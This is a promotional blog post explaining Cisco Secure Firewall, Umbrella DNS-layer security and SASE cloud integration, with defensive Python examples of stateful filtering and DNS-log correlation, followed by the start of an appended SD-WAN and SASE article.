
Cisco Secure Firewall with SASE Cloud


In today's digital era, network security is of paramount importance. With the rise of cloud-based services and remote work, businesses require a comprehensive security solution that not only protects their network but also ensures scalability and flexibility. Cisco Secure Firewall with SASE (Secure Access Service Edge) Cloud is a cutting-edge solution that combines the robustness of firewall protection with the agility of cloud-based security services. In this blog post, we will delve into the features and benefits of Cisco Secure Firewall with SASE Cloud.

Cisco Secure Firewall is an advanced network security solution designed to safeguard organizations from cyber threats. Built on industry-leading technology, it provides next-generation firewall capabilities, intrusion prevention, and application control. With granular security policies, deep visibility, and advanced threat intelligence, Cisco Secure Firewall empowers businesses to protect their networks from internal and external threats effectively.

SASE (Secure Access Service Edge) is a transformative approach to network security and connectivity. By converging networking and security functions into a unified cloud-based service, SASE offers organizations scalable and flexible security solutions. Cisco Secure Firewall with SASE Cloud takes advantage of this architecture, providing businesses with integrated security services that are delivered from the cloud. This enables seamless scalability, simplified management, and enhanced protection against evolving threats.

a) Cloud-Native Firewall: Cisco Secure Firewall with SASE Cloud leverages the power of cloud-native architecture, enabling organizations to easily scale their security infrastructure based on demand. It ensures consistent security policies across various locations and eliminates the need for hardware-based firewalls.

b) Advanced Threat Protection: With integrated threat intelligence and advanced analytics, Cisco Secure Firewall with SASE Cloud offers robust protection against sophisticated threats. It provides real-time threat detection and prevention, ensuring that businesses stay one step ahead of cybercriminals.

c) Simplified Management: The centralized management console allows organizations to effortlessly manage their security policies and configurations. From a single interface, administrators can efficiently deploy and enforce security policies, reducing complexity and enhancing operational efficiency.

As organizations continue to embrace digital transformation, the network landscape is constantly evolving. Cisco Secure Firewall with SASE Cloud future-proofs your network by providing a scalable and adaptable security solution. Its cloud-native architecture and integration with SASE enable businesses to stay agile and easily adapt to changing security requirements, ensuring long-term protection and resilience.

Highlights: Cisco Secure Firewall with SASE Cloud

Understanding the Cisco Secure Firewall

Cisco Secure Firewall is a cutting-edge network security appliance that provides advanced threat protection, secure connectivity, and simplified management. It combines next-generation firewall capabilities with intrusion prevention, application visibility and control, and advanced malware protection. With its comprehensive suite of security features, it offers a multi-layered defense against a wide range of cyber threats.

Key Cisco Secure Firewall Features:

– Advanced Threat Protection: The Cisco Secure Firewall employs advanced intelligence to detect and prevent sophisticated attacks, including malware, ransomware, and zero-day exploits. Its integrated security technologies work in tandem to identify and mitigate threats in real time, ensuring the highest level of protection for your network infrastructure.

– Secure Connectivity: The Cisco Secure Firewall enables secure remote access and site-to-site connectivity with built-in VPN capabilities. It establishes encrypted tunnels, allowing authorized users to access network resources from anywhere while ensuring data confidentiality and integrity.

– Application Visibility and Control: Gaining visibility into network traffic and effectively managing application usage is crucial for optimizing network performance and ensuring security. The Cisco Secure Firewall offers granular application control, allowing administrators to define policies and prioritize critical applications while restricting or blocking unauthorized ones.

**Broken Firewall Rules**

One-third of your firewall rules are broken. You can use the Cisco AI Assistant for Security to identify and report on such policies, augment troubleshooting, and automate policy lifecycle management. You can also take back control of your encrypted traffic and application environments. Cisco Talos lets you see and detect more across your infrastructure while ensuring security resilience across billions of signals.

**Advanced Clustering & HA**

This enables you to drive efficiency at scale. Secure Firewall’s advanced clustering, high availability, and multi-instance capabilities allow you to scale, be reliable, and be productive. Finally, by integrating network, microsegmentation, and app security, Secure Firewall makes zero trust achievable and cost-effective. It automates access and anticipates what comes next.

Knowledge Check: Cisco’s Firewalling

Cisco integrated its original Sourcefire’s next-generation security technologies into its existing firewall solutions, the Adaptive Security Appliances (ASA). In that early implementation, Sourcefire technologies ran as a separate service module. Later, Cisco designed new hardware platforms to support Sourcefire technologies natively.

They are named Cisco Firepower, later rebranded as Cisco Secure Firewall, which is the current implementation of Firewalling. In the new implementation, Cisco converges Sourcefire’s next-generation security features, open-source Snort, and ASA’s firewall functionalities into a unified software image. This unified software is called the Firepower Threat Defense (FTD). After rebranding, this software is now known as the Cisco Secure Firewall.

Example Security Technology: IPS IDS

Understanding Suricata

Suricata is an open-source network threat detection engine that offers high-performance intrusion detection and prevention capabilities. Built with speed, scalability, and robustness, Suricata analyzes network traffic and detects various threats, including malware, exploits, and suspicious activities. Its multi-threaded architecture and rule-based detection mechanism make it a formidable weapon against cyber threats.

Suricata boasts an impressive array of features that elevate its effectiveness in network security. Suricata covers various security needs, from protocol analysis and content inspection to file extraction and SSL/TLS decryption. Its extensive rule set allows for fine-grained control over network traffic, enabling tailored threat detection and prevention. Additionally, Suricata supports various output formats, making it compatible with other security tools and SIEM solutions.

Understanding SASE Cloud

Cisco SASE Cloud, short for Secure Access Service Edge Cloud, is a comprehensive networking and security platform that combines wide area networking (WAN) capabilities with robust security features. It offers a unified solution for remote access, branch connectivity, and cloud security, all delivered from the cloud. This convergence of networking and security into a single cloud-native platform allows organizations to simplify their infrastructure, reduce costs, and enhance agility.

SASE Cloud Key Points:

Enhanced Security: One of Cisco SASE Cloud’s standout features is its advanced security capabilities. By leveraging a combination of next-generation firewalls, secure web gateways, data loss prevention, and other security services, it provides comprehensive protection against cyber threats. With SASE Cloud, organizations can ensure secure access to applications and data from anywhere, anytime, without compromising security.

Scalability and Flexibility: Cisco SASE Cloud offers unmatched scalability and flexibility. As an organization grows, SASE Cloud can quickly adapt to evolving needs. Whether it’s adding new branches, onboarding remote employees, or expanding into new markets, the cloud-native architecture of SASE Cloud enables seamless scalability without the need for extensive infrastructure investments.

Simplified Management: Managing complex networking and security infrastructure can be daunting for IT teams. However, Cisco SASE Cloud simplifies this process by centralizing management and providing a single pane of glass for visibility and control. This streamlined approach allows IT teams to monitor and manage network traffic efficiently, apply security policies, and troubleshoot issues, improving operational efficiency.

Secure Access Anywhere & Anytime

Converged Networking and Security: Cisco SASE combines networking and security functions, such as secure web gateways, firewalls, and data loss prevention, into a single solution. This convergence eliminates the need for multiple standalone appliances, reducing complexity and improving operational efficiency.

Cloud-Native Architecture: Built on a cloud-native architecture, Cisco SASE leverages the scalability and flexibility of the cloud. This enables organizations to dynamically adapt to changing network demands, scale their resources as needed, and integrate new security services without significant infrastructure investments.

Enhanced User Experience and Security: With Cisco SASE, users can enjoy a seamless and secure experience regardless of location or device. Cisco SASE protects users and data from threats through its integrated security capabilities, including zero-trust network access and secure web gateways, ensuring a safe and productive digital environment.

Related: For additional pre-information, you may find the following helpful:

  1. SD WAN SASE
  2. SASE Model
  3. Zero Trust SASE
  4. SASE Solution
  5. Distributed Firewalls
  6. SASE Definition

Evolution of the Network Security

In the past, network security was typically delivered from the network using the Firewall. Today, however, network security extends well beyond firewalling. We now have different points in the infrastructure that we can use to expand our security posture while reducing the attack surface.

You would have commonly heard of Cisco Umbrella Firewall and SASE, along with Cisco Secure Workload security, which can be used with your Cisco Secure firewall, which is still deployed at the network’s edge. Unfortunately, you can’t send everything to the SASE cloud.

You will still need an on-premise firewall, such as the Cisco Secure Firewall, that can perform standard stateful filtering, intrusion detection, and threat protection. This post will examine the Cisco Secure Firewall and its integration with Cisco Umbrella via the SASE Cloud. Firstly, let us address some basics of firewalling.

A. Redesigning Traditional Security:
Let’s examine the evolution of network security before we get into some inbound and outbound traffic use cases. Traditionally, the Firewall was placed at the network edge, acting as a control point for the network’s ingress/egress point. The Firewall was responsible for validating communications with rule sets and policies created and enforced at this single point of control to ensure that desired traffic was allowed into and out of the network and undesirable traffic was prevented. This type of design was known as the traditional perimeter approach to security.

B: Numerous Firewalling challenges:
Today, branch office locations, remote employees, and the increasing use of cloud services drive more data away from the traditional “perimeter.” The cloud-first approach completely bypasses the conventional security control point.
Further, the overwhelming majority of business locations and users also require direct access to the Internet, where an increasing share of critical applications and data now lives. As a result, applications and data become further decentralized, and networks become more diverse.

C: Conventional Appliance Sprawl:
This evolution of network architectures has dramatically increased our attack surfaces and made the job of protecting them more complicated. So, we started to answer this challenge with point solutions. Typically, organizations have attempted to address these challenges by adding the "best" point security solution for each new problem as it emerges.

Because of this approach, we have seen tremendous device sprawl. Multiple security products from different vendors can pose significant management problems for network security teams, eventually leading to complexity and blind spots.

Consequently, our "traditional" firewall devices are being augmented by a mixture of physical and virtual appliances. Some are embedded into the network, while others are delivered as a service, host-based, or included within public cloud environments. Regardless of the design, you will still have inbound and outbound traffic to protect.

**Basics of Firewalling**

A firewall is an entity or obstacle deployed between two structures to prevent fire from spreading from one system to another. This term has been taken into computer networking, where a firewall is a software or hardware device that enables you to filter unwanted traffic and restrict access from one network to another. The Firewall is a vital network security component in securing network infrastructure and can take many forms. For example, we can have a host-based or network-based Firewall.

Diagram: Firewall types. Source: IPwithease.

Firewalling Types:

A. Host-based Firewall

A host-based firewall service is installed locally on a computer system. In this case, the end user’s computer system takes the final action—to permit or deny traffic. Every operating system has some Firewall. It consumes the resources of a local computer to run the firewall services, which can impact the other applications running on that particular computer. Furthermore, in a host-based firewall architecture, traffic traverses all the network components and can consume the underlying network resources until the traffic reaches its target.

B. Network-based Firewall

On the other hand, a network-based firewall can be entirely transparent to an end user and is not installed on the computer system. Typically, you deploy it in a perimeter network or at the Internet edge where you want to prevent unwanted traffic from entering your network. The end-user computer system remains unaware of any traffic control by an intermediate device performing the filtering. In a network-based firewall deployment, you do not need to install additional software or daemon on the end-user computer systems. However, it would help if you used both firewall types for a defense-in-depth approach.

The early generation of firewalls could allow or block packets only based on their static elements, such as a packet’s source address, destination address, source port, destination port, and protocol information. These elements are also known as the 5-tuple.

Example Technology Cisco Packet Filter

### Implementing Packet Filtering in Your Network

To effectively implement packet filtering, it’s crucial to have a clear understanding of your network architecture and traffic patterns. Begin by identifying the critical assets that need protection and the types of traffic that should be allowed. Develop a detailed access list, considering both inbound and outbound traffic.

C. Stateless Firewalling

When an early-generation firewall examined a particular packet, it was unaware of any prior packets that passed through it because it was agnostic of the Transmission Control Protocol (TCP) states that would have signaled this. Due to the nature of its operation, this type of Firewall is called a stateless firewall.

A stateless firewall is unable to distinguish the state of a particular packet. So, for example, it could not determine if a packet is part of an existing connection, trying to establish a legitimate new connection, or whether it is a manipulated, rogue packet. We then moved to a stateful inspection firewall and an application-aware form of next-generation firewalling.

D. Stateful Firewalling

Stateful inspection tracks the state of TCP and UDP connections by their port numbers, while an application-aware firewall examines Layer 7. So now we are at a stage where the Firewall does some of everything, as the Cisco Secure Firewall does.
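As an added illustration of the stateless versus stateful distinction above (a constructed example, not Cisco code): a 5-tuple access list that must statically permit replies, beside a connection-tracking filter that admits replies only for sessions it saw being opened. The inside network, the addresses and the rogue packet are assumed sample values.

```python
"""Stateless 5-tuple filtering versus stateful connection tracking.

Constructed example, not Cisco code: a minimal TCP packet model, an access
list of 5-tuple rules, and a session table keyed by the 5-tuple.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Dict, FrozenSet, List, Optional, Tuple


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    sport: int
    dport: int
    flags: FrozenSet[str]          # TCP flags, e.g. {"SYN"} or {"ACK"}
    proto: str = "tcp"


@dataclass(frozen=True)
class Rule:
    action: str                    # "permit" or "deny"
    src: str                       # source CIDR
    dst: str                       # destination CIDR
    sport: Optional[int] = None    # None means any port
    dport: Optional[int] = None
    proto: str = "tcp"

    def matches(self, p: Packet) -> bool:
        return (p.proto == self.proto
                and ip_address(p.src) in ip_network(self.src)
                and ip_address(p.dst) in ip_network(self.dst)
                and (self.sport is None or p.sport == self.sport)
                and (self.dport is None or p.dport == self.dport))


def stateless_filter(rules: List[Rule], p: Packet) -> str:
    """First-match ACL over the static 5-tuple only, with an implicit deny."""
    for r in rules:
        if r.matches(p):
            return r.action
    return "deny"


Key = Tuple[str, str, int, str, int]


class StatefulFirewall:
    """Same ACL, but reply traffic is admitted only for sessions the firewall
    itself saw being opened by a permitted SYN."""

    def __init__(self, rules: List[Rule]):
        self.rules = rules
        self.sessions: Dict[Key, str] = {}

    @staticmethod
    def _key(p: Packet) -> Key:
        return (p.proto, p.src, p.sport, p.dst, p.dport)

    @staticmethod
    def _reverse(p: Packet) -> Key:
        return (p.proto, p.dst, p.dport, p.src, p.sport)

    def process(self, p: Packet) -> str:
        k = self._key(p) if self._key(p) in self.sessions else self._reverse(p)
        if k in self.sessions:
            # Packet belongs to a tracked session: advance or tear down state.
            if "RST" in p.flags or "FIN" in p.flags:
                del self.sessions[k]
            elif self.sessions[k] == "SYN_SENT" and p.flags >= {"SYN", "ACK"}:
                self.sessions[k] = "ESTABLISHED"
            return "permit"
        # A new connection must start with a bare SYN that the ACL permits.
        if p.flags == frozenset({"SYN"}) and stateless_filter(self.rules, p) == "permit":
            self.sessions[self._key(p)] = "SYN_SENT"
            return "permit"
        # Anything else, e.g. an inbound ACK posing as a reply, is dropped.
        return "deny"


INSIDE = "10.0.0.0/8"   # assumed inside network
# A stateless ACL has to statically permit replies from any server's port 443;
# that static rule is exactly what a stateless design cannot tie to a session.
ACL = [
    Rule("permit", INSIDE, "0.0.0.0/0", dport=443),
    Rule("permit", "0.0.0.0/0", INSIDE, sport=443),
]


def demo() -> dict:
    """Push a legitimate HTTPS handshake and a constructed rogue packet through
    both designs; return the verdicts and the stateful session table."""
    syn = Packet("10.0.0.7", "203.0.113.10", 51000, 443, frozenset({"SYN"}))
    synack = Packet("203.0.113.10", "10.0.0.7", 443, 51000, frozenset({"SYN", "ACK"}))
    rogue = Packet("198.51.100.9", "10.0.0.7", 443, 3389, frozenset({"ACK"}))
    fw = StatefulFirewall(ACL)
    return {
        "stateless": [stateless_filter(ACL, p) for p in (syn, synack, rogue)],
        "stateful": [fw.process(p) for p in (syn, synack, rogue)],
        "sessions": dict(fw.sessions),
    }
```

The stateless ACL permits all three packets, including the rogue one, because its static "sport 443 to inside" rule cannot tell a reply from a forged one; the stateful filter permits only the handshake it tracked.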

Diagram: CBAC Firewall.

**Firewalling Use Cases**

1. Inbound Use Case

The Firewall picks up every packet, looks at the different fields, examines it for signatures that could signal an attack in progress, and then re-packs and sends the packet out its interfaces. This technique is still relevant: it tracks inbound traffic to tell whether someone outside or inside is accessing the private applications you want to keep secure. So, looking at every packet remains relevant for the inbound traffic use case.

Since almost everything is encrypted these days, you need to decrypt traffic to gain security value. Deep Packet Inspection (DPI) is still very relevant for inbound traffic. So, we will continue to decrypt inbound traffic for complete application threat protection, with the hope of minimal functional impact.

Example Technology: Sensitive Data Protection with Google Cloud


2. Outbound Use Case

Then, we need to look at outbound traffic. Here, things have changed considerably. Some users no longer pass through a firewall at all; they go straight to applications hosted outside the protection of your on-premise security stack and network. These are applications in the cloud, such as SaaS applications, which do not tolerate network devices in the middle interfering with their traffic.

Therefore, applications such as Office365 are designed to reduce the chance of any network or security device peeking into their traffic. For example, you could have mutual certificate authentication with the service in the cloud. So, there are a couple of options here besides the traditional DPI approach used for the inbound traffic use case.

**Improving Security: Understanding the network**

Understanding Network Scanning

Network scanning involves exploring computer networks to gather information about connected devices, open ports, and system vulnerabilities. Cybersecurity professionals gain valuable insights into the network’s architecture, potential entry points, and security risks by utilizing various scanning techniques and tools.

There are different types of network scans, each serving a specific purpose. Port scans identify open ports and services running on them, while vulnerability scans aim to pinpoint weaknesses within network devices, applications, or configurations. Additionally, network mapping scans visually represent the network’s structure, aiding in better understanding and management.

Example: Cisco Secure Firewall 3100

Cisco has the Cisco Secure Firewall 3100, a mid-range model that can be an Adaptive Security Appliance (ASA) for standard stateful firewall inspection or Firewall Threat Defense (FTD) software.

So it can run one or the other. It also has clustering, multi-instance firewalling, and high availability, which we will discuss. In addition, the 3100 series throughput range addresses use cases from the Internet edge to the data center and private cloud.

Cisco Secure Firewall 3100 is an advanced next-generation firewall that provides comprehensive security and high performance for businesses of all sizes. Its advanced security features can protect an organization’s most critical assets, from data, applications, and users to the network infrastructure. Cisco Secure Firewall 3100 offers an integrated threat defense system that combines intrusion prevention, application control, and advanced malware protection. This firewall is designed to detect and block malicious traffic and protect your network from known and unknown threats.

Diagram: Cisco Secure Firewall. Source: Cisco.

Adaptive Security Appliance (ASA) and Firewall Threat Defense (FTD)

The platforms can be deployed in Firewall (ASA) and dedicated IPS (FTD) modes. In addition, the 3100 series supports Q-in-Q (stacked VLAN) up to two 802.1Q headers in a packet for inline sets and passive interfaces. The platform also supports FTW (fail-to-wire) network modules.

Remember that you cannot mix and match ASA and FTD modes. However, you can make FTD operate similarly to the ASA. The heart of the Cisco Secure Firewall is Snort, one of the most popular open-source intrusion detection and prevention systems, capable of real-time traffic inspection.

**IPS Engine – Snort**

What’s powerful about the Cisco Secure Firewall is its high decryption performance due to the Crypto Engine. The Firewall has an architecture built around decrypting traffic and delivers impressive performance. In addition, you can tune your CPU cores to perform more traditional ASA functionality, such as IPsec termination and stateful firewall inspection.

In such a scenario, we have an IPS engine (based on Snort) but give it only 10% of the cores. We can then provide 90% of the data plane to traditional firewalling. So, a VPN headend or basic stateful Firewall would use more data plane cores.

On the other hand, any heavy IPS and file inspection would be biased toward more “Snort” Cores. Snort provides the IPS engine to tailor the performance profiles to your liking. We have configurable CPU Core allocation, which can be set statically, not dynamically.

Secure Firewalling Features:

1. Secure Firewall Feature: Clustering

Your Secure Firewall deployment can also expand as your organization grows to support its network growth. You do not need to replace your existing devices for additional horsepower; you can add threat defense devices to your current deployment and group them into a single logical cluster to support additional throughput. 

A clustered logical device offers higher performance, scalability, and resiliency simultaneously. You can create a cluster between multiple chassis or between multiple security modules within the same chassis. When a cluster is built from multiple independent chassis, it is called inter-chassis clustering.

2. Secure Firewall Feature: Multi-Instance

The Secure Firewall offers multi-instance capability powered by Docker container technology. It enables you to create and run multiple application instances using a small subset of a chassis’s hardware resources. You can independently manage the threat defense application instances as separate threat defense devices. Multi-instance capability enables you to isolate many critical elements.

3. Secure Firewall Feature: High Availability

In a high-availability architecture, one device operates actively while the other stays on standby. A standby device does not actively process traffic or security events. For example, suppose a failure is detected in the active device, or there’s any discontinuation of keepalive messages from the active device.

In that case, the standby device takes over the role of the active device and starts operating actively to maintain continuity in firewall operations. An active device periodically sends keepalive messages and replicates its configuration to the standby device. Therefore, the communication channel between the peers of a high-availability pair must be robust and have very low latency.

Exploring SASE Cloud

One way to examine SaaS-based applications and introduce some cloud security is by using Cisco Umbrella with the SASE Cloud. The SASE Cloud can also include a cloud access security broker known as Cloudlock. The Cisco Umbrella CASB is like a broker that hooks into the application’s backend to determine users’ actions. It does this by querying the service via an Application Programming Interface (API) call rather than by DPI.

Diagram: Cisco Umbrella. Source: Cisco.

Cisco Cloudlock is the part of the SASE cloud that provides a cloud-native cloud access security broker (CASB) to protect your cloud users, data, and apps. Cloudlock’s simple, open, and automated approach uses APIs to manage the risks in your cloud app ecosystem. With Cloudlock, you can more quickly combat data breaches while meeting compliance regulations.

Cisco Umbrella also has a firewall known as the Cisco Umbrella Firewall. The Cisco Umbrella Firewall can improve its policy decisions using information gleaned from the CASB. In addition, we can map network flows to a specific user action via cloud applications and CASB solutions. So this is one area you can look into.

Extending the Firewall with SASE Cloud

Cisco Umbrella Firewall:

The SASE Cloud with Cisco Umbrella firewall is a good solution that can be combined with the on-premise Firewall. So, if you have FTD at the edge of your network, why would you need to introduce a Cisco Umbrella Firewall or any other SASE technologies? Or if you have a SASE cloud with Cisco Umbrella, why would you need FTD?

First, it makes sense to process specific traffic locally. However, the two categories of traffic that Cisco Umbrella excels in beyond any firewall are DNS and CASB. Your edge firewall is less effective against some outbound traffic, such as dynamically changing DNS and undecryptable TLS connections. DNS is Cisco Umbrella’s bread and butter.

DNS Requests Precede the IP Connection

Knowledge Check: Cisco DNS-layer security.

DNS requests precede the IP connection, enabling DNS resolvers to log requested domains over any port or protocol for all network devices, office locations, and roaming users. As a result, you can monitor DNS requests and subsequent IP connections to improve the accuracy and detection of compromised systems, security visibility, and network protection. 

You can also block requests to malicious destinations before a connection is even established, thus stopping threats before they reach your network or endpoints. Cisco Umbrella under the hood can clean your DNS traffic and stop the attacks before they get to any malicious connection. 
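An added example of the DNS-layer correlation described above; it is not Cisco Umbrella’s code, and the log formats, domains and addresses are constructed. It applies a domain blocklist at resolution time, then explains each later connection by the DNS answer that preceded it, flagging connections to IPs that were resolved from blocked names and connections that no DNS lookup preceded at all.

```python
"""Correlating DNS-layer logs with the IP connections that follow them.

Constructed example, not Cisco Umbrella's code or log format. A resolver
log and a flow log are embedded as sample text; a domain blocklist is
enforced at DNS time, and each later flow is explained by (or flagged for
lacking) the DNS answer the same client received shortly before it.
"""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Assumed blocklist of known-bad names (constructed, reserved test domains).
BLOCKLIST = {"updates.example-bad.test", "cdn.malicious.invalid"}

# Constructed resolver log: <epoch> <client> <qname> <answer ip>
DNS_LOG = """\
1700000000 10.0.0.7 www.example.com 93.184.216.34
1700000003 10.0.0.7 updates.example-bad.test 203.0.113.55
1700000010 10.0.0.9 login.example.org 198.51.100.20
"""

# Constructed flow log: <epoch> <src> <dst> <dport>
FLOW_LOG = """\
1700000001 10.0.0.7 93.184.216.34 443
1700000004 10.0.0.7 203.0.113.55 443
1700000012 10.0.0.9 198.51.100.20 443
1700000020 10.0.0.9 192.0.2.77 8443
"""

DNS_RE = re.compile(r"^(\d+) (\S+) (\S+) (\S+)$")
FLOW_RE = re.compile(r"^(\d+) (\S+) (\S+) (\d+)$")


def dns_verdict(qname: str, blocklist=BLOCKLIST) -> str:
    """DNS-layer enforcement: a blocked name gets no answer, so the client
    never learns an IP and no connection is ever attempted."""
    return "block" if qname in blocklist else "resolve"


def parse_dns(dns_log: str) -> Dict[Tuple[str, str], List[Tuple[int, str]]]:
    """Index resolver answers as (client, answer_ip) -> [(ts, qname), ...]."""
    index: Dict[Tuple[str, str], List[Tuple[int, str]]] = defaultdict(list)
    for line in dns_log.splitlines():
        m = DNS_RE.match(line)
        if m:
            index[(m[2], m[4])].append((int(m[1]), m[3]))
    return index


def correlate(dns_log: str, flow_log: str, blocklist=BLOCKLIST,
              window: int = 300) -> List[Tuple[int, str, str, str]]:
    """Explain each flow by the DNS answer the same client received within
    `window` seconds before it. Returns (ts, src, dst, finding) per flow."""
    index = parse_dns(dns_log)
    findings = []
    for line in flow_log.splitlines():
        m = FLOW_RE.match(line)
        if not m:
            continue
        ts, src, dst = int(m[1]), m[2], m[3]
        prior = [(t, q) for t, q in index.get((src, dst), []) if 0 <= ts - t <= window]
        if not prior:
            # No lookup preceded this connection: a hard-coded address, or a
            # resolver this log does not see. Worth a look either way.
            findings.append((ts, src, dst, "no-dns-precedent"))
            continue
        _, qname = max(prior)                  # most recent answer wins
        if qname in blocklist:
            findings.append((ts, src, dst, f"blocked-domain:{qname}"))
        else:
            findings.append((ts, src, dst, f"resolved:{qname}"))
    return findings
```

With enforcement on, the second flow never happens because the name is refused at DNS time; in monitoring mode, the correlation still attributes that connection to the blocked name even though the TLS session itself was never decrypted.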

SASE Cloud: Cisco Umbrella CASB.

Also, you cannot decrypt SaaS application traffic or perform CASB functions on the edge firewall. The Firewall can’t detect whether the user is carrying out data exfiltration.

With SASE cloud, Cisco Umbrella, and its integrated CASB offering, we get better visibility into this type of traffic and can apply a risk category to certain kinds of activity. So now we have an excellent combination: the cloud security stack does what it does best and takes those processing cycles away from the Firewall.

**Cisco Umbrella Integration**

The Cisco Secure Firewall offers DNS redirection to the Cisco Umbrella Firewall. The on-premise Firewall communicates with Cisco Umbrella via API and pulls in the existing DNS policy, so the Umbrella DNS policies can be used alongside the current firewalling policies. Recently, Cisco has gone one step further: you can have a SIG tunnel between the Cisco Secure Firewall Management Center (FMC) and Cisco Umbrella.

Each tunnel has its own IKE ID, and multiple tunnels to Umbrella can be bundled. We can now load balance across multiple spoke tunnels with a per-tunnel custom IKE ID. Once set up, we can send certain kinds of traffic down each tunnel.

**Endpoint controls**

Then, we have the endpoint, such as your desktop computer or phone. We can collect a wealth of information about each network connection and feed it into the Firewall as metadata. This metadata can be provided to both the Cisco Umbrella Firewall and the Cisco Secure Firewall, again for improved policy decisions.

The Firewall, whether the Cisco Secure Firewall or the Cisco Umbrella Firewall, does not need to decrypt any traffic for this. Instead, we can get client context discovery via passive fingerprinting using an agent on the endpoint, which yields a wealth of attributes you can’t get with DPI. So we can move away from relying on DPI for everything and augment it with all the other components to get better visibility.

Summary: Cisco Secure Firewall with SASE Cloud

In today’s rapidly evolving digital landscape, organizations face the challenge of ensuring robust security while embracing the benefits of cloud-based solutions. Cisco Secure Firewall with SASE (Secure Access Service Edge) Cloud offers a comprehensive and streamlined approach to address these concerns. This blog post delved into the features and benefits of this powerful combination, highlighting its ability to enhance security, simplify network management, and optimize performance.

Understanding Cisco Secure Firewall

Cisco Secure Firewall serves as the first line of defense against cyber threats. Its advanced threat detection capabilities and deep visibility into network traffic provide proactive protection for organizations of all sizes. Cisco Secure Firewall ensures a secure network environment by preventing unauthorized access, blocking malicious content, or detecting and mitigating advanced threats.

Introducing SASE Cloud

On the other hand, SASE Cloud revolutionizes how organizations approach network and security services. SASE Cloud offers a scalable and agile solution by converging network functions and security services into a unified cloud-native platform. It combines features such as secure web gateways, data loss prevention, firewall-as-a-service, and more, all delivered from the cloud. This eliminates the need for costly on-premises infrastructure and allows businesses to scale their network and security requirements effortlessly.

The Power of Integration

When Cisco Secure Firewall integrates with SASE Cloud, it creates a formidable combination that enhances security posture while delivering optimal performance. The integration allows organizations to extend their security policies seamlessly across the entire network infrastructure, including remote locations and cloud environments. This unified approach ensures consistent security enforcement, reducing potential vulnerabilities and simplifying management overhead.

Simplified Network Management

One of the key advantages of Cisco Secure Firewall with SASE Cloud is its centralized management and control. Administrators can easily configure and enforce security policies, monitor network traffic, and gain valuable insights through a single pane of glass. This simplifies network management, reduces complexity, and enhances operational efficiency, enabling IT teams to focus on strategic initiatives rather than mundane tasks.

Conclusion:

In conclusion, the combination of Cisco Secure Firewall with SASE Cloud provides organizations with a robust and scalable security solution that meets the demands of modern networks. By integrating advanced threat detection, cloud-native architecture, and centralized management, this potent duo empowers businesses to navigate the digital landscape confidently. Experience the benefits of enhanced security, simplified management, and optimized performance by adopting Cisco Secure Firewall with SASE Cloud.



SD WAN SASE

SD-WAN, or Software-Defined Wide Area Networking, is a transformative technology that enhances network connectivity for geographically dispersed businesses. By utilizing software-defined networking principles, SD-WAN empowers organizations to optimize their wide area network infrastructure, reduce costs, and improve application performance. The key features of SD-WAN include dynamic path selection, centralized management, and enhanced security capabilities.

Secure Access Service Edge, or SASE, is an emerging architectural framework that combines network security and wide area networking into a single cloud-native service. SASE offers a holistic approach to secure network connectivity, integrating features such as secure web gateways, firewall-as-a-service, zero-trust network access, and data loss prevention. By converging security and networking functions, SASE simplifies network management, improves performance, and enhances overall security posture.

Implementing SD-WAN and SASE brings forth a multitude of benefits for businesses. Firstly, organizations can achieve cost savings by leveraging cheaper internet links and reducing reliance on expensive MPLS connections. Secondly, SD-WAN and SASE improve application performance through intelligent traffic steering, ensuring optimal user experience. Moreover, the centralized management capabilities of these technologies simplify network operations, reducing complexity and enhancing agility.

To implement SD-WAN and SASE effectively, businesses need to consider several key factors. This includes evaluating their existing network infrastructure, defining their security requirements, and selecting the appropriate vendors or service providers. It is crucial to design a well-thought-out migration plan and ensure seamless integration with existing systems. Additionally, comprehensive testing and monitoring are essential to guarantee a smooth transition and ongoing success.

As technology continues to evolve, the future of network connectivity lies in the hands of SD-WAN and SASE. These innovative solutions enable businesses to embrace digital transformation, support remote workforces, and adapt to rapidly changing business needs. The integration of artificial intelligence and machine learning capabilities within SD-WAN and SASE will further enhance network performance, security, and automation.

SD-WAN and SASE are revolutionizing network connectivity by providing businesses with scalable, cost-effective, and secure solutions. The combination of SD-WAN's optimization capabilities and SASE's comprehensive security features creates a powerful framework for modern network infrastructures. As organizations navigate the ever-evolving digital landscape, SD-WAN and SASE will undoubtedly play a crucial role in shaping the future of network connectivity.

Highlights: SD WAN SASE

Understanding SD-WAN

SD-WAN is a networking approach that utilizes software-defined principles to simplify the management and operation of a wide area network. It replaces conventional hardware-based network appliances with software-based solutions, enabling centralized control and automation of network resources. By separating the control plane from the data plane, SD-WAN optimizes traffic routing and provides enhanced visibility and control over network performance.

One of SD-WAN’s key advantages is its ability to enhance network performance. With traditional WAN architectures, network traffic may suffer from congestion and latency issues, leading to decreased performance and user dissatisfaction.

**Dynamic Routing**

SD-WAN tackles these challenges by dynamically routing traffic across multiple paths, optimizing the utilization of available bandwidth. Additionally, it offers intelligent traffic prioritization and Quality of Service (QoS) mechanisms, ensuring that critical applications receive the necessary bandwidth and delivering an improved user experience.

**Advanced Security Features**

Security is a critical concern for any network infrastructure. SD-WAN addresses this concern by incorporating advanced security features. Encryption protocols, secure tunneling, and traffic segmentation are some of the security mechanisms provided by SD-WAN solutions.

Furthermore, SD-WAN offers improved network resilience by enabling automatic failover and seamless traffic rerouting in case of link failures. This ensures high availability and minimizes the impact of network disruptions on critical business operations.

Cisco SD-WAN Cloud hub

SD-WAN Cloud Hub serves as a centralized networking architecture that enables businesses to connect their various branch locations to the cloud. It leverages the software-defined networking (SDN) capabilities of SD-WAN technology to establish secure and optimized connections over the internet. With SD-WAN Cloud Hub, businesses can achieve superior network performance, reduced latency, and enhanced security compared to traditional WAN solutions.

– Enhanced Network Performance: SD-WAN Cloud Hub optimizes network traffic and intelligently routes it through the most efficient path, resulting in improved application performance and user experience.

– Increased Security: With built-in encryption and secure tunnels, SD-WAN Cloud Hub ensures the confidentiality and integrity of data transmitted between branch locations and the cloud.

– Simplified Network Management: The centralized control and management capabilities of SD-WAN Cloud Hub make it easy for businesses to monitor and configure their network settings, reducing complexity and operational costs.

Example WAN Performance & PfR:

Understanding Performance-Based Routing

Performance-based routing is a dynamic method that uses network monitoring tools and algorithms to determine the most efficient path for data transmission. Unlike traditional routing protocols, which rely on static metrics such as hop count, performance-based routing considers factors such as latency, packet loss, and available bandwidth. By constantly evaluating network performance, routers can make informed decisions in real time and keep traffic on the path that currently meets the application's needs.

